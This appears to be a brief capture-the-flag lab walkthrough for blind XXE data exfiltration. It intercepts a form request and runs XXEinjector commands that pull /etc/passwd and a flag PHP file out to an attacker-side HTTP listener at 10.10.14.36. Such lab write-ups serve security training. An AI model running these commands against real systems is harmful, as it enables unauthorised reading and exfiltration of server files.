Blind Data Exfiltration
Using Blind Data Exfiltration on the '/blind' page to read the content of '/327a6c4304ad5938eaf0efb6cc3e53dc.php' and get the flag.
Form: http://10.129.202.84/blind/
Intercept the POST request after submitting the form
Remove the inputs and close the request with XXEINJECT at the bottom of the request.
Copy to file > xxe.req
ruby XXEinjector.rb --host=10.10.14.36 --httpport=8000 --file=xxe.req --path=/etc/passwd --oob=http --phpfilter
/etc/passwd logs will be stored in the Logs folder.
Try to read /327a6c4304ad5938eaf0efb6cc3e53dc.php
ruby XXEinjector.rb --host=10.10.14.36 --httpport=8000 --file=xxe.req --path=/327a6c4304ad5938eaf0efb6cc3e53dc.php --oob=http --phpfilter
Last updated